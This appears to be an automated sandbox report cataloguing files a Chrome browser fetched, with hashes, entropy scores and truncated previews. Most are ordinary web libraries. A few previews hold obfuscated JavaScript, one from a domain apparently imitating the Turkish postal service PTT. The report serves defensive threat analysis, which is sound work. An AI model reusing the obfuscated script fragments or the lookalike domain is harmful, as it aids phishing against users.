                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,......}.W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............._.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1878
                                                                                                                                                                                            Entropy (8bit):5.099221191787203
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:t4LE1XD/D1rHxmS2CHGFCt0u9cLp/NW5Aj5AfCJCDh2GhbIL82Nsd8xbpTGPjehh:+6XjlHoS2CmYoXWNbAx5p0KyD0l
                                                                                                                                                                                            MD5:B441F960B07A4EC1688F2EDB043F767A
                                                                                                                                                                                            SHA1:848D59D73CC5324CD222CE97D6FFD48FF7D8021F
                                                                                                                                                                                            SHA-256:9160F6D5855A884D542A3DE24B58E892616D74CFA9BDD9816C209350003EB71D
                                                                                                                                                                                            SHA-512:133D9616277EF27F0430DCB5E7D1D5C2023D2BBE8AB06B286B2F8B395B85DE2B6E330779F6906672860C660000C080E46D0F7F1CAB8CD5E036415708F1C06607
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/img/down_button.svg
                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="54" height="54" viewBox="0 0 54 54">.. <defs>.. <filter id="Ellipse_369" x="0" y="0" width="54" height="54" filterUnits="userSpaceOnUse">.. <feOffset dy="3" input="SourceAlpha"/>.. <feGaussianBlur stdDeviation="3" result="blur"/>.. <feFlood flood-color="#2c2828" flood-opacity="0.259"/>.. <feComposite operator="in" in2="blur"/>.. <feComposite in="SourceGraphic"/>.. </filter>.. <clipPath id="clip-path">.. <rect width="8" height="14" fill="none"/>.. </clipPath>.. </defs>.. <g id="Group_11280" data-name="Group 11280" transform="translate(604 -1140) rotate(90)">.. <g id="Group_140" data-name="Group 140" transform="translate(1146 559)">.. <g transform="matrix(0, -1, 1, 0, -6, 45)" filter="url(#Ellipse_369)">.. <g id="Ellipse_369-2" data-name="Ellipse 369" transform="translate(45 6) rotate(90)" fill="#fff" stroke="rgba(136,152,170,0.5)" stroke-w
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (4005)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4436
                                                                                                                                                                                            Entropy (8bit):5.598657081005046
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:n/EKhN5jG91m+Lu1ur64EJD0l3cyvp9n1iI+ZM67IB+RvUCFa:/EKhK91mkUX4EJD8r9nUL7IB+RcQa
                                                                                                                                                                                            MD5:D940AFE8635CC3409F9E3AE7EA0518CD
                                                                                                                                                                                            SHA1:4DF3E545964A46C46A204E2B072C7FCF4BC2FA7B
                                                                                                                                                                                            SHA-256:49D6396A823560D47584B60E9A88A2374F87A02626F8ED2DBCFAC29885651197
                                                                                                                                                                                            SHA-512:B21A7807DB9FACD47DF2A2629E15EB127022F0107FC651C13578505E5737BB64D1F2D8C85135730879EC739838049AFEB42DD21CFB13B8A27FEE4AF5F137B79B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/js/langcodes.min.js
                                                                                                                                                                                            Preview:var acjsLanguagesList={"af":"Afrikaans","sq":"Albanian - shqip","am":"Amharic - ....","ar":"Arabic - .......","an":"Aragonese - aragon.s","hy":"Armenian - .......","ast":"Asturian - asturianu","az":"Azerbaijani - az.rbaycan dili","eu":"Basque - euskara","be":"Belarusian - ..........","bn":"Bengali - .....","bs":"Bosnian - bosanski","br":"Breton - brezhoneg","bg":"Bulgarian - .........","ca":"Catalan - catal.","ckb":"Central Kurdish - ..... (........ ......)","zh":"Chinese - ..","zh-HK":"Chinese (Hong Kong) - ......","zh-CN":"Chinese (Simplified) - ......","zh-TW":"Chinese (Traditional) - ......","co":"Corsican","hr":"Croatian - hrvatski","cs":"Czech - .e.tina","da":"Danish - dansk","nl":"Dutch - Nederlands","en":"English","en-AU":"English (Australia)","en-CA":"English (Canada)","en-IN":"English (India)","en-NZ":"English (New Zealand)","en-ZA":"English (South Africa)","en-G
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (32033)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):37045
                                                                                                                                                                                            Entropy (8bit):5.174934618594778
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
                                                                                                                                                                                            MD5:5869C96CC8F19086AEE625D670D741F9
                                                                                                                                                                                            SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
                                                                                                                                                                                            SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
                                                                                                                                                                                            SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/bootstrap/js/bootstrap.min.js
                                                                                                                                                                                            Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10360
                                                                                                                                                                                            Entropy (8bit):7.772743411893453
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:nIT6oZvIiGiCBjFDsnk/7vzukL1f3hBXF8h6UaM:nrodrGiGwnkTvKQ13W0Ux
                                                                                                                                                                                            MD5:C7D382ABD20C03688E3C72F9AB09E535
                                                                                                                                                                                            SHA1:D290EE4A0D10EBD46208206CB44C69C72C8DF2B5
                                                                                                                                                                                            SHA-256:9DEC48B0372F2CB164F2FEBD05E909A1C7B49C1BE12E1A143BA7FBD43435EE6A
                                                                                                                                                                                            SHA-512:997AD2487E21001921490F84979FFB4096F885DF5C938CB083C74E65B1316A98D02DB689C37E3FB1CC0A6DFED32432B7E6341DEEB3C98F9AA80532E59EC87BA6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..(.IDATx...Mz.X.7`....+ ..............R+.....0...V....JVPf..+..C.u.\...#[....|.].G..s~:.....^..0,.....!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!...!.|..'..k.L..C.......M..\.q.x.?...3.G7.o.q]..hG.P.O.x}...l..b...sq..8..-\..<.'...y..tqL_..p.uv]n......:.J.;...IV.G.....bq#\:3..p..?^......<(5..t..5.s.EpZ.O..w-..[..UO..|..E.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):136
                                                                                                                                                                                            Entropy (8bit):5.00666710239018
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:InjZoSzunSTzGeCmzthrNQDv1GnT1KUnIbjEREkk2h4CEj:8ZoS6STz3bNNQ4nTA+IbjEEWEj
                                                                                                                                                                                            MD5:D20B36E8AC57810380AEF8DCC7736C36
                                                                                                                                                                                            SHA1:98F2BE7A337FD40153553D6208ED686B0382626C
                                                                                                                                                                                            SHA-256:0B89CC2AC78747D8C7640C9E9756E83E4E61572B52AD0CD94F3182F71373A397
                                                                                                                                                                                            SHA-512:D60354D79CE9E35650E6EA64A15A41C976E6471BBF8D860E2F2958B22AF93A57F03CB97AC21A91533050CB4F5D1752C389A48DD911B9087AC4FA63DAB2BDC035
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISLAk4C7nXvQYn6RIFDZFhlU4SBQ2UVPrPEgUN6h8j9hIFDXRlOh4SBQ1wYBmoEhAJ0TBeD4r0xmwSBQ2RYZVOEhAJMmJ6A2-tyi8SBQ2UVPrPEhAJleSPaj2k45sSBQ3qHyP2EhcJAsivaDEjD_cSBQ10ZToeEgUNcGAZqA==?alt=proto
                                                                                                                                                                                            Preview:Ci0KBw2RYZVOGgAKBw2UVPrPGgAKBw3qHyP2GgAKBw10ZToeGgAKBw1wYBmoGgAKCQoHDZFhlU4aAAoJCgcNlFT6zxoACgkKBw3qHyP2GgAKEgoHDXRlOh4aAAoHDXBgGagaAA==
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (52146)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):53104
                                                                                                                                                                                            Entropy (8bit):5.227530657260376
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:TMmDcX+V9NQhASRs39o2sBabuVV0cI7fxDRUZq:TRAX+7/RsBKuj0cI7VRUZq
                                                                                                                                                                                            MD5:A776E06B72C85E797B740BD2D8B72177
                                                                                                                                                                                            SHA1:178F266CB57B535F9026210BD0A81E2D4F661F54
                                                                                                                                                                                            SHA-256:59E40E563B52ED0F9F6F98F299618ECCC9A75F47CFEE7B4125BBE5D548AD3C31
                                                                                                                                                                                            SHA-512:80026AF0668053BF6BA7EC6BD5261F885CDDB06191E9EE2D60E8B05413FE579E44D9E6D24B682246209D3E08AA835917AF4B9BC50A2A4D265FC5F7DA6B16EE69
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18c0e3(0x108))/0x4*(parseInt(_0x18c0e3(0x1aa))/0x5)+parseInt(_0x18c0e3(0x1a2))/0x6*(-parseInt(_0x18c0e3(0x1c8))/0x7)+-parseInt(_0x18c0e3(0x16a))/0x8+parseInt(_0x18c0e3(0x1be))/0x9+-parseInt(_0x18c0e3(0x14a))/0xa*(-parseInt(_0x18c0e3(0x106))/0xb);if(_0xa80895===_0x5b4f7e)break;else _0x35d09c['push'](_0x35d09c['shift']());}catch(_0x5b3a28){_0x35d09c['push'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./index-f5457718.js';/*!. * vue-router v4.1.6. * (c) 2022 Eduardo San Martin Morote. * @license MIT. */.const G=typeof window<'u';function nt(_0xe
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 32x19, 32 bits/pixel
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):2570
                                                                                                                                                                                            Entropy (8bit):3.527155255496045
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:06baFI5vY0u68gsGOLynrZFTWxBtwJGwPBheAuaAxI4l60O+9DL:0h8vo6jZOsrZFyEJGwPBh7uve4llOwP
                                                                                                                                                                                            MD5:14EE76D740C6D351E447C37B1A9DDB37
                                                                                                                                                                                            SHA1:CDD7D04160D5624C219CCB8FD2D4F557D77DB99B
                                                                                                                                                                                            SHA-256:32EF97D69F5188DF3EB8BCA51E02A151FFB615E21FA0E4EABFA884CDD4DB0485
                                                                                                                                                                                            SHA-512:66945FA193F2E3B94A35FC4C5AA6F19321B3F832BB0491B70A1787C12CB6B5A25E7D591D9FE33827883934A3DB3808BDDC64898B16ED824244AA15EE86351817
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/favicon.ico
                                                                                                                                                                                            Preview:...... ..... .........(... ...&..... .........#...#.................................................$..V..r..`..5..............?..Z..d..Z..=..........................................................T........p..,........ ..f.............................1.......................................r........w..........."..............E.................A........|............................f...........(...........\........s................................W......................../...........].......................5......................................e...A...Y.................Q...........7.......................&..............................................&..............t.....q...........0..............y........:.................................................!...O......8........,.................:........A....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1965), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1965
                                                                                                                                                                                            Entropy (8bit):5.287237545046552
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:cP2k+LBK+qcy+SDaOrKhbM4O7IlH2VZ5RJR7RRRdilxXmxV4y5T0zxHI2MRRtMav:99Zqh+GOOMlH2Si35A1HpMdtZAlA
                                                                                                                                                                                            MD5:D66FEBB5B4397732135B71831C138AFD
                                                                                                                                                                                            SHA1:B2A462BAD03E25C4109424B80B8C3F1CC7055558
                                                                                                                                                                                            SHA-256:E24C314BD212C166353D089356F9296351B7D31D88E7D386197443A970BA6AB5
                                                                                                                                                                                            SHA-512:8C933EBA937FD28674F709FE7E2B342877D37F7B1A269EC09023EB98891D6E13402C0F14793DEA90C2CF1B510A6EFFCA317BBAC43EAC30A2336327EFB6D2448F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/09bf01f8JxKnW.js
                                                                                                                                                                                            Preview:function a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','constructo'];a0_0x1726=function(){return _0x590fb6;};return a0_0x1726();}(function(_0x3fc008,_0x3d9ca0){const _0x55189d=a0_0x1055,_0x3a6928=_0x3fc008();while(!![]){try{const _0x29b996=parseInt(_0x55189d(0xcd))/0x1+-parseInt(_0x55189d(0xc4))/0x2+parseInt(_0x55189d(0xd1))/0x3+parseInt(_0x55189d(0xd3))/0x4*(parseInt(_0x55189d(0xce))/0x5)+-parseInt(_0x55189d(0xc5))/0x6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_0x1055(_0xf64470,_0x4b0865){const _0x32fcc2=a0_0x1726();return a0_0x1055=function(_0xb13448,_0x57136d){_0xb13448=_0xb13448-0xc2;let _0x172600=_0x32fcc
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):504521
                                                                                                                                                                                            Entropy (8bit):5.245686837916366
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:NtjBw2fR0+JDC9yvd8l8hiuyaqQeuKiv7fD6oAj0BBlNAroY4DPindxfy3GOpBJ/:feSDypuKiv7fD6oAj0BBlNA2exfy1Jfn
                                                                                                                                                                                            MD5:1E8E7D0C756EE63FCBCED0E685E20191
                                                                                                                                                                                            SHA1:1E7AEC9DE709ADDED1E8D31B0D449C3D05B68810
                                                                                                                                                                                            SHA-256:294E75B0E7510057A175FFF959C4EF20249DA107A3CE2CEE0D5A19CB138694E4
                                                                                                                                                                                            SHA-512:B1E1BDC77DBA9F648B0BE98A8BB2959E135103D51D203B3714419F59E81AEE5DD53B02E206862AF80109FA5A336DFC7E707D35906514D8008ED9FF888FDE64ED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1bf(0x644))/0x4)+parseInt(_0x9ea1bf(0x58d))/0x5*(parseInt(_0x9ea1bf(0x690))/0x6)+-parseInt(_0x9ea1bf(0x41c))/0x7*(-parseInt(_0x9ea1bf(0x14d))/0x8)+-parseInt(_0x9ea1bf(0x51f))/0x9+parseInt(_0x9ea1bf(0x236))/0xa*(-parseInt(_0x9ea1bf(0x283))/0xb);if(_0x53ae22===_0x549cdb)break;else _0x218c3b['push'](_0x218c3b['shift']());}catch(_0x1145ce){_0x218c3b['push'](_0x218c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea9eb=!![];return function(_0x3eb55f,_0x1b8e91){var _0x3870d7=_0x4ea9eb?function(){var _0x12f3a9=a38_0x435b;if(_0x1b8e91){var _0x30af4e=_0x1b8e91
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                            Entropy (8bit):4.440074751043314
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:kw3dA4jgWYHJiv3dA4jgW6QfpXD3dA4jgW6Qen:FtDjdYHJwtDjd6EpXDtDjd6h
                                                                                                                                                                                            MD5:7C3F7E060745668041278118C0BB3D6D
                                                                                                                                                                                            SHA1:E639F56695B3CC30D78DCE7A0084AA8299A1311A
                                                                                                                                                                                            SHA-256:DE5341313A4DC5D982CA50AE4A491E84BC5E80B0F439D87F05FC3973C1B7E59A
                                                                                                                                                                                            SHA-512:B12A692EF9BE5857423F2DF563B986E241F7161573B5A7F23190696D1B0A50C5DA453C7BD35641FE61695B459D0A7D76F8053A8E0E0CCBC6811F800AAB1532C6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/3nPo4dxLHf5a0RshtsAsa/_middlewareManifest.js
                                                                                                                                                                                            Preview:self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (39147)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):39197
                                                                                                                                                                                            Entropy (8bit):5.4001840374174455
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:nqx9b8AKgKsRc/oN18LomsOJllMj46t4juV02dphUYJJ37Kq0DsX8ho:nrg0LoxL4EPTKq0DmOo
                                                                                                                                                                                            MD5:05287FEDBF49F0D2132F0DC70599BA79
                                                                                                                                                                                            SHA1:E43E4149D87D67F99818C16CF15CC9ADFE5EECDC
                                                                                                                                                                                            SHA-256:19825050F2757A03DAE4B40BA5D49EF07ED130BE9D81E43EF0184DD29FF99603
                                                                                                                                                                                            SHA-512:5343B40744E441EFDDFD8C2FFD11718BF0EAD9F78DCA6CFC3374FA693C2B287673A1C01A6ECBFD92D0A57562D576BA4D5508D9E939B175E7B3B7538C66F3312D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/5698-10f078fe5b68f680.js
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5698],{3975:function(t,e){"use strict";e.byteLength=function(t){var e=a(t),r=e[0],n=e[1];return 3*(r+n)/4-n},e.toByteArray=function(t){var e,r,o=a(t),s=o[0],h=o[1],u=new i(function(t,e,r){return 3*(e+r)/4-r}(0,s,h)),f=0,c=h>0?s-4:s;for(r=0;r<c;r+=4)e=n[t.charCodeAt(r)]<<18|n[t.charCodeAt(r+1)]<<12|n[t.charCodeAt(r+2)]<<6|n[t.charCodeAt(r+3)],u[f++]=e>>16&255,u[f++]=e>>8&255,u[f++]=255&e;2===h&&(e=n[t.charCodeAt(r)]<<2|n[t.charCodeAt(r+1)]>>4,u[f++]=255&e);1===h&&(e=n[t.charCodeAt(r)]<<10|n[t.charCodeAt(r+1)]<<4|n[t.charCodeAt(r+2)]>>2,u[f++]=e>>8&255,u[f++]=255&e);return u},e.fromByteArray=function(t){for(var e,n=t.length,i=n%3,o=[],s=16383,h=0,a=n-i;h<a;h+=s)o.push(u(t,h,h+s>a?a:h+s));1===i?(e=t[n-1],o.push(r[e>>2]+r[e<<4&63]+"==")):2===i&&(e=(t[n-2]<<8)+t[n-1],o.push(r[e>>10]+r[e>>4&63]+r[e<<2&63]+"="));return o.join("")};for(var r=[],n=[],i="undefined"!==typeof Uint8Array?Uint8Array:Array,o="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):140991
                                                                                                                                                                                            Entropy (8bit):5.264901399717059
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:M9vlesNeZ3jR4o2RQ/hmXz4fwKYhOIAMiUqI8ix+vQm1dqNYQyI:M9aJmvKgiUB8ixnyI
                                                                                                                                                                                            MD5:1D0C748A53E59829E7489BC32E1BF6EA
                                                                                                                                                                                            SHA1:245BA9E40E10D5113B0BDE991134D26321FFA259
                                                                                                                                                                                            SHA-256:65A5CB546ABBAB311927A21D335453FAA75C1D5F35E1F058E9934166741C6B95
                                                                                                                                                                                            SHA-512:F3903CE2E309DACBA41CC8A904C59D5F04D8204503703FC77DBAF47F17954B5B328D0A28A9028ED209C203A7F04037F1382F768B018BE93857CAC00DA0ED2972
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{2760:function(e,n,t){var r=t(2466),l=t(1062);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=new Set,u={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(u[e]=n,e=0;e<n.length;e++)o.add(n[e])}var c=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):66461
                                                                                                                                                                                            Entropy (8bit):5.199378053156873
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:NJMB6MVRvBaKyRABaKyRFF5JDWOenyS87BntgL:6VRQR5RFNydP8tntgL
                                                                                                                                                                                            MD5:B93DA97CD55A2E4195627852FCD89CE3
                                                                                                                                                                                            SHA1:F2C3ED7DB88A85B2B26414C0ECA3F3188359B10E
                                                                                                                                                                                            SHA-256:CB4182042A3075CE08853BF3E5ECD4F3295C9FAD99C94E0D1A9C9CD139BE1FA6
                                                                                                                                                                                            SHA-512:37A6AA311E34AADE2AB55ED987DB3A1207984D8A232ED04F7EE730020332211DB315CBAC7E19E472D5D664FD64B1A3AEF5127F6ED82548E51EBDD75C0CED299C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
